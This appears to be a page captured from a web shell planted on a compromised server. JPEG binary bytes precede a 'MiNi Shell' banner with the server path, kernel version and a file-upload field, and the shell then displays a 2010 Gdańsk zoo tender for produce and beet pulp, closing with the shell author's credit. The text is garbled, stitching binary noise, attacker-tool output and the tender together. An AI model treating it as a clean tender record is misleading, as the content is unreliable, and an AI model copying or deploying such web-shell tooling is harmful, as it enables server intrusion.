JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100901/273556-N-2010.html

<p class="kh_header"><b>Gdańsk Oliwa: Zamówienie publiczne  Nr  03.2.D/2010  Dostawa warzyw, owoców i wysłodków buraczanych do Miejskiego Ogrodu Zoologicznego Wybrzeża</b><br>
<b>Numer ogłoszenia: 273556 - 2010; data zamieszczenia: 01.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ogród Zoologiczny "Wybrzeża" , ul. Karwieńska 3, 80-328 Gdańsk Oliwa, woj. pomorskie, tel. 058 5520041, fax 058 5521751.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.gd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ogrody zoologiczne i botaniczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie publiczne  Nr  03.2.D/2010  Dostawa warzyw, owoców i wysłodków buraczanych do Miejskiego Ogrodu Zoologicznego Wybrzeża.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA

Zadanie I: warzywa okopowe
a)	03.22.11.12-4 - marchew w ilości 40.000kg
b)	03.21.21.00-1 - ziemniak w ilości 18.000kg
c)	03.22.11.10-0 - burak czerwony w ilości 30.000kg	
d)	03.22.12.22-8 - burak pastewny w ilości 35.000kg
e)	03.22.11.10-0 - brukiew jadalna w ilości 2.200kg
f)	03.22.13.00-9 - jarmuż w ilości 1.500kg
g)	03.22.11.12-4 - marchew młoda w ilości 3.000kg
h)	03.22.14.10-3 - kapusta biała w ilości 13.000kg
i)	03.22.11.10-0 - pietruszka korzeń w ilości 1.800kg
j)	03.22.13.00-9 - por w ilości 2.500kg
k)	03.22.11.10-0 - seler w ilości 2.500kg
l)	03.22.14.20-6 - kalafior w ilości 600kg
m)	03.22.14.00-0 - kalarepa w ilości 900kg

Zadanie II: warzywa szklarniowe
a)	03.22.13.10-2 - sałata w ilości 5.000szt.
b)	03.22.14.00-0 - kapusta pekińska w ilości 2.700kg
c)	03.22.11.13-1 - szczypior gruntowy w ilości 150kg
d)	03.22.12.00-8 - arbuzy w ilości 1.500kg
e)	03.22.12.00-8 - melon żółty w ilości 2.000kg
f)	03.21.12.00-5 - kukurydza cukrowa kolby w ilości 600kg
g)	03.22.14.30-9 - brokuły w ilości 1.400kg
h)	03.22.11.10-0 - pietruszka zielona (natka) w ilości 150kg
i)	03.22.12.40-0 - pomidory w ilości 2.700kg
j)	03.22.12.30-7 - papryka czerwona w ilości 2.700kg
k)	03.22.12.70-9 - ogórki w ilości 2.700kg
l)	03.22.11.10-0 - botwina gruntowa w ilości  400kg
m)	03.22.11.14-8 - rzodkiewka bez liści w ilości 150kg
n)	03.22.11.13-1 - cebula w ilości 1.600kg
o)	03.22.12.12-5 - fasola szparagowa zielona w ilości 500kg
p)	03.22.11.14-8 - biała rzodkiew w ilości 1.000kg
q)	03.22.11.13-1 - czosnek w ilości 5kg
r)	03.22.13.00-9 - cykoria w ilości 700kg
s)	03.11.13.00-5 - słonecznik (tarcza) w ilości 90kg
t)	03.22.10.00-6 - seler naciowy w ilości 1.400kg
u)	03.22.12.00-8 - dynia w ilości 1.000kg
v)	03.22.12.50-3 - cukinia w ilości 1.000kg

Zadanie III: owoce krajowe
a)	03.22.23.21-9 - jabłka w ilości 13.500kg
b)	03.22.23.22-6 - gruszki w ilości 200kg
a)	03.22.23.13-0 - truskawki 150kg
b)	03.22.23.30-5 - czereśnie 50kg
c)	03.22.23.33-6 - wiśnie 80kg
d)	03.22.23.34-3 - śliwki węgierki 80kg
e)	03.22.23.00-6 - aronia 20kg
f)	03.22.23.10-9 - czarne jagody (borówka czarna) 20kg
g)	03.22.23.11-6 - czarna porzeczka 20kg
h)	03.22.23.11-6 - czerwona porzeczka 20kg

Zadanie IV: owoce cytrusowe
a)	03.22.21.11-4 - banany w ilości 6.500kg
b)	03.22.22.10-8 - cytryny w ilości 550kg
c)	03.22.21.18-3 - pomarańcze w ilości 2000kg
d)	03.22.21.18-3 - kiwi w ilości 1200kg
e)	03.22.23.30-5 - nektarynki w ilości 450kg
f)	03.22.23.40-8 - winogrona w ilości 1.100kg
g)	03.22.21.00-4 - granaty w ilości 700kg
h)	03.22.21.10-7 - papaje w ilości 100szt.

Zadanie V: orzechy
a)	03.11.12.00-4 - orzeszki ziemne w łupinie w ilości 150kg
b)	03.22.20.00-3 - orzechy laskowe w łupinie w ilości 180kg
c)	03.22.20.00-3 - orzechy włoskie krajowe w łupinie w ilości 50kg
d)	03.22.20.00-3 - orzechy laskowe łuskane w ilości 130kg
e)	03.22.20.00-3 - orzechy włoskie krajowe łuskane w ilości 50kg

Zadanie VI: 
 wysłodki buraczane suszone zwykłe w ilości 11.000kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1, 03.22.20.00-3, 15.83.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda od Wykonawców wniesienia wadium.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.)
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego.
Nr rachunku bankowego Zamawiającego: 53 1160 2202 0000 0000 4278 3543.
Wadium wnosi się przed upływem terminu składania ofert.
Wadium zostaje określone dla każdej części ( zadania) zamówienia oddzielnie. W tytule wpłaty wadium należy podać którego zadania dotyczy.
Zamawiający żąda wniesienia wadium w wysokości:
a)	zadanie I - 2800 zł.
b)	zadanie II - 5400 zł.
c)	zadanie III - 600 zł.
d)	zadanie IV - 2000 zł.
e)	zadanie V - 500 zł.
f)	zadanie VI - nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 zamówienia publiczne, polegające na dostawie przedmiotu zamówienia na który Wykonawca składa ofertę, 
o wartości minimum:
Zadanie I - 86.000 PLN brutto
Zadanie  II - 160.000 PLN brutto
Zadanie III - 19.000 PLN brutto
Zadanie IV - 60.000 PLN brutto
Zadanie V - 14.000 PLN brutto

Zadanie VI - nie dotyczy.

Ocena na podstawie przedstawionych dokumentów dla każdego zadania oddzielnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Warzywa muszą być przechowywane w magazynach z możliwością regulacji temperatury.
2)	Wykonawca dysponuje, do przewozu warzyw, samochodem typu izoterma posiadającym zezwolenie na przewóz żywności.
3)	Marchew, burak czerwony, pietruszka korzeń, seler, brukiew jadalna, buraki pastewne,
muszą być płukane w płuczkarce.
4)	Wykonawca dysponuje, do przewozu owoców, samochodem typu Izoterma posiadającym zezwolenie na przewóz żywności.
5)	Kubatura magazynów musi zapewnić przechowywanie wymaganej ilości towaru do wykonania zamówienia.
6)	Wykonawca musi dysponować potencjałem technicznym niezbędnym do zapewnienia wymaganej wielkości dostaw warzyw ( zadanie I oraz II ).

Ocena na podstawie przedstawionych dokumentów - wskazanie gospodarstwa, opis gospodarstwa, warunków produkcji, przechowywania i transportu - dotyczy zadania I oraz II.
Dla wszystkich zadań dokumenty dotyczące samochodu.
Zamawiający zastrzega sobie możliwość sprawdzenia danych zawartych w ofercie poprzez
wizytację  przedstawicieli Zamawiającego we wskazanych w ofercie gospodarstwach rolnych i ogrodniczych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Umowy z producentami, bądź oświadczenia producentów o zapewnieniu wielkości dostaw dla zadań  I oraz II  - dotyczy Wykonawców nie będących producentami.
2)	Opis gospodarstwa producenta - warunków produkcji, przechowywania i transportu, posiadane certyfikaty i nagrody (zaleca się ich załączenie).
3)	Dokument potwierdzający dopuszczenie środka transportu do przewozu żywności.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.gd.pl/podstrona przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ogród Zoologiczny  Wybrzeża 
Jednostka Budżetowa
80-328 Gdańsk - Oliwa ul. Karwieńska 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 09:00, miejsce: Miejscem składania ofert jest siedziba Miejskiego Ogrodu Zoologicznego Wybrzeża
Gdańsk-Oliwa ul. Karwieńska 3 - pokój nr 3 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa okopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I: warzywa okopowe
a)	03.22.11.12-4 - marchew w ilości 40.000kg
b)	03.21.21.00-1 - ziemniak w ilości 18.000kg
c)	03.22.11.10-0 - burak czerwony w ilości 30.000kg	
d)	03.22.12.22-8 - burak pastewny w ilości 35.000kg
e)	03.22.11.10-0 - brukiew jadalna w ilości 2.200kg
f)	03.22.13.00-9 - jarmuż w ilości 1.500kg
g)	03.22.11.12-4 - marchew młoda w ilości 3.000kg
h)	03.22.14.10-3 - kapusta biała w ilości 13.000kg
i)	03.22.11.10-0 - pietruszka korzeń w ilości 1.800kg
j)	03.22.13.00-9 - por w ilości 2.500kg
k)	03.22.11.10-0 - seler w ilości 2.500kg
l)	03.22.14.20-6 - kalafior w ilości 600kg
m)	03.22.14.00-0 - kalarepa w ilości 900kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.12-4, 03.22.11.10-0, 03.22.12.22-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa szklarniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II: warzywa szklarniowe
a)	03.22.13.10-2 - sałata w ilości 5.000szt.
b)	03.22.14.00-0 - kapusta pekińska w ilości 2.700kg
c)	03.22.11.13-1 - szczypior gruntowy w ilości 150kg
d)	03.22.12.00-8 - arbuzy w ilości 1.500kg
e)	03.22.12.00-8 - melon żółty w ilości 2.000kg
f)	03.21.12.00-5 - kukurydza cukrowa kolby w ilości 600kg
g)	03.22.14.30-9 - brokuły w ilości 1.400kg
h)	03.22.11.10-0 - pietruszka zielona (natka) w ilości 150kg
i)	03.22.12.40-0 - pomidory w ilości 2.700kg
j)	03.22.12.30-7 - papryka czerwona w ilości 2.700kg
k)	03.22.12.70-9 - ogórki w ilości 2.700kg
l)	03.22.11.10-0 - botwina gruntowa w ilości  400kg
m)	03.22.11.14-8 - rzodkiewka bez liści w ilości 150kg
n)	03.22.11.13-1 - cebula w ilości 1.600kg
o)	03.22.12.12-5 - fasola szparagowa zielona w ilości 500kg
p)	03.22.11.14-8 - biała rzodkiew w ilości 1.000kg
q)	03.22.11.13-1 - czosnek w ilości 5kg
r)	03.22.13.00-9 - cykoria w ilości 700kg
s)	03.11.13.00-5 - słonecznik (tarcza) w ilości 90kg
t)	03.22.10.00-6 - seler naciowy w ilości 1.400kg
u)	03.22.12.00-8 - dynia w ilości 1.000kg
v)	03.22.12.50-3 - cukinia w ilości 1.000kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.13.10-2, 03.22.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III: owoce krajowe
a)	03.22.23.21-9 - jabłka w ilości 13.500kg
b)	03.22.23.22-6 - gruszki w ilości 200kg
a)	03.22.23.13-0 - truskawki 150kg
b)	03.22.23.30-5 - czereśnie 50kg
c)	03.22.23.33-6 - wiśnie 80kg
d)	03.22.23.34-3 - śliwki węgierki 80kg
e)	03.22.23.00-6 - aronia 20kg
f)	03.22.23.10-9 - czarne jagody (borówka czarna) 20kg
g)	03.22.23.11-6 - czarna porzeczka 20kg
h)	03.22.23.11-6 - czerwona porzeczka 20kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9, 03.22.23.22-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Owoce cytrusowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie IV: owoce cytrusowe
a)	03.22.21.11-4 - banany w ilości 6.500kg
b)	03.22.22.10-8 - cytryny w ilości 550kg
c)	03.22.21.18-3 - pomarańcze w ilości 2000kg
d)	03.22.21.18-3 - kiwi w ilości 1200kg
e)	03.22.23.30-5 - nektarynki w ilości 450kg
f)	03.22.23.40-8 - winogrona w ilości 1.100kg
g)	03.22.21.00-4 - granaty w ilości 700kg
h)	03.22.21.10-7 - papaje w ilości 100szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.11-4, 03.22.21.18-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Orzechy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie V: orzechy
a)	03.11.12.00-4 - orzeszki ziemne w łupinie w ilości 150kg
b)	03.22.20.00-3 - orzechy laskowe w łupinie w ilości 180kg
c)	03.22.20.00-3 - orzechy włoskie krajowe w łupinie w ilości 50kg
d)	03.22.20.00-3 - orzechy laskowe łuskane w ilości 130kg
e)	03.22.20.00-3 - orzechy włoskie krajowe łuskane w ilości 50kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.12.00-4, 03.22.20.00-3, 03.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wysłodki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wysłodki buraczane suszone zwykłe w ilości 11.000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com